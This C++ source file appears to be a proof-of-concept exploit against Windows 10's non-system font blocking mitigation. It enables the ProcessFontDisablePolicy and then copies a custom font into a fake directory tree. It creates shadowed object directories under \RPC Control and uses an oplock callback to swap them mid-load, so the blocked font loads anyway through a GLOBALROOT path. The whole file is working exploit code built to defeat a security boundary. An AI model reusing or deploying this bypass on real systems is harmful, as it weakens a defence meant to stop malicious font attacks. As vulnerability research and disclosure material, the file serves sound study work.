#include "stdafx.h"
#include <Shlwapi.h>
#include <string>
#include <vector>
#include "ScopedHandle.h"

#define FONT_NAME L"pacifico"

const wchar_t kFontSymlinkName[] = L"\\RPC Control\\fonttest";

std::wstring GetAppPath()
{
  WCHAR apppath[MAX_PATH];

  GetModuleFileName(nullptr, apppath, MAX_PATH);

  wchar_t* p = wcsrchr(apppath, '\\');
  if (p)
  {
    *p = 0;
  }
  return apppath;
}

std::wstring GetSystemFontPath()
{
  PWSTR path = nullptr;
  HRESULT hr = SHGetKnownFolderPath(FOLDERID_Fonts, 0, nullptr, &path);
  if (FAILED(hr))
  {
    printf("Error getting font path: %08X\n", hr);
    exit(1);
  }
  std::wstring ret = path;
  CoTaskMemFree(path);

  ret += L"\\vgaoem.fon";

  return ret;
}

std::wstring GetLocalFontPath()
{
  return GetAppPath() + L"\\" FONT_NAME L".ttf";
}

BOOL TestFontLoad(const std::wstring& font_path)
{
  int nResults = AddFontResourceEx(
    font_path.c_str(),
    FR_PRIVATE,    	// font characteristics
    NULL);
  printf("[INFO] Font Load Count: %d\n", nResults);
  
  HFONT hFont = CreateFont(16, 16, 0, 0, FW_DONTCARE, 
    0, 0, 0, 0, 0, 0, 0, 0, FONT_NAME);
  HDC dc = CreateCompatibleDC(nullptr);
  SelectObject(dc, hFont);
  WCHAR font[100] = {};
  GetTextFace(dc, 100, font);
  printf("[INFO] Captured Face: %ls\n", font);
  return _wcsicmp(font, FONT_NAME) == 0;
}

void DisableCustomFonts()
{
  PROCESS_MITIGATION_FONT_DISABLE_POLICY setpolicy = {};  
  setpolicy.DisableNonSystemFonts = 1;

  if (!SetProcessMitigationPolicy(ProcessFontDisablePolicy, &setpolicy, sizeof(setpolicy)))
  {
    printf("[ERROR] Couldn't disable custom fonts (%ls). Running on Windows 10?\n", GetErrorMessage().c_str());
    exit(1);
  }
}

HANDLE CreateObjectDirectoryShadow(HANDLE hRoot, LPCWSTR path, LPCWSTR shadow)
{
  ScopedHandle hShadow(OpenObjectDirectory(nullptr, shadow), false);
  if (!hShadow)
  {
    printf("[ERROR] Couldn't open shadow directory %ls\n", shadow);
    exit(1);
  }

  HANDLE hDir = CreateObjectDirectory(hRoot, path, hShadow);  
  if (!hDir)
  {
    printf("[ERROR] Couldn't create object directory %ls\n", path);
    exit(1);
  }

  return hDir;
}

void OplockCallback(LPVOID arg)
{
  printf("Switching object directory\n");
  CloseHandle(arg);
  if (!CreateObjectDirectoryShadow(nullptr, L"\\RPC Control\\ABC", L"\\Device"))
  {
    printf("[ERROR] Creating new object directory\n");
    exit(1);
  }
}

std::wstring GetRootDriveVolumeName(const std::wstring& drive)
{
  WCHAR drive_path[3];
  WCHAR target_path[MAX_PATH];

  if (drive.size() < 2)
  {
    printf("Invalid drive path: %ls\n", drive.c_str());
    exit(1);
  }

  drive_path[0] = drive[0];
  drive_path[1] = drive[1];
  drive_path[2] = 0;

  if (QueryDosDevice(drive_path, target_path, MAX_PATH) == 0)
  {
    printf("Error querying drive %ls %ls\n", drive_path, GetErrorMessage().c_str());
    exit(1);
  }

  WCHAR* p = wcsrchr(target_path, '\\');
  if (p)
    return p + 1;
  return target_path;
}

std::vector<std::wstring> GetPathComponents(const std::wstring& path)
{
  std::vector<std::wstring> ret;
  const wchar_t* last_p = path.c_str();
  const wchar_t* p = wcschr(last_p, L'\\');

  while (p)
  {
    ret.push_back(std::wstring(last_p, p - last_p));

    while (*p == L'\\')
      p++;

    last_p = p;
    p = wcschr(p, L'\\');
  }
  ret.push_back(last_p);
  return ret;
}

std::wstring GetDummyDirPath()
{
  std::wstring app_path = GetAppPath();
  return app_path + L"\\XYZ";
}

HANDLE CreateDirectoryChain()
{
  std::wstring dummy_dir = GetDummyDirPath();
  std::vector<std::wstring> components = GetPathComponents(dummy_dir);
  HANDLE hDir = CreateObjectDirectory(nullptr, L"\\RPC Control\\ABC", nullptr);
  HANDLE hCurrDir = CreateObjectDirectory(hDir, GetRootDriveVolumeName(dummy_dir).c_str(), nullptr);
  
  for (size_t i = 1; i < components.size() - 1; ++i)
  {
    hCurrDir = CreateObjectDirectory(hCurrDir, components[i].c_str(), nullptr);
  }

  CreateObjectDirectoryShadow(hCurrDir, components[components.size() - 1].c_str(), L"\\Device");

  return hDir;
}

std::wstring CopyLocalFontToPath()
{
  std::wstring dir_path = GetDummyDirPath();
  std::wstring system_font_device = GetRootDriveVolumeName(GetSystemFontPath());

  CreateDirectory(dir_path.c_str(), nullptr);
  dir_path += L"\\" + system_font_device;
  CreateDirectory(dir_path.c_str(), nullptr);

  std::vector<std::wstring> system_path = GetPathComponents(GetSystemFontPath());

  for (size_t i = 1; i < system_path.size() - 1; ++i)
  {
    dir_path += L"\\" + system_path[i];
    CreateDirectory(dir_path.c_str(), nullptr);
  }
  
  dir_path += L"\\" + system_path[system_path.size() - 1];

  if (!CopyFile(GetLocalFontPath().c_str(), dir_path.c_str(), FALSE))
  {
    printf("[ERROR] Couldn't copy font file to %ls\n", dir_path.c_str());
    exit(1);
  }

  return dir_path;
}

int wmain(int argc, WCHAR** argv)
{
  DisableCustomFonts();
  std::wstring local_path = CopyLocalFontToPath();

  printf("[TEST] loading %ls directly\n", local_path.c_str());

  if (GetFileAttributes(local_path.c_str()) == INVALID_FILE_ATTRIBUTES)
  {
    printf("Couldn't find font file %ls\n", local_path.c_str());
    exit(1);
  }

  if (TestFontLoad(local_path))
  {
    printf("[ERROR] Unexpected success of custom font loading, maybe already loaded?\n");
    exit(1);
  }
  printf("[SUCCESS] Direct loading of the font failed as expected\n");

  std::wstring system_font = GetSystemFontPath();
  std::wstring system_font_device = GetRootDriveVolumeName(system_font);

  std::wstring native_path = L"\\\\?\\GLOBALROOT\\RPC Control\\ABC\\" + GetRootDriveVolumeName(local_path);
  native_path += &local_path[2];

  printf("[INFO] Native Path: %ls\n", native_path.c_str());

  HANDLE hFakeDir = CreateDirectoryChain();

  FileOpLock* oplock = FileOpLock::CreateLock(GetSystemFontPath(), L"", OplockCallback, hFakeDir);
  if (!oplock)
  {
    printf("[ERROR] creating oplock\n");
    exit(1);
  }

  if (!TestFontLoad(native_path))
  {
    printf("[ERROR] Failed to load custom font!\n");
    
  }
  printf("[SUCCESS] Indirect loading of the font succeeded\n");

  return 0;
}

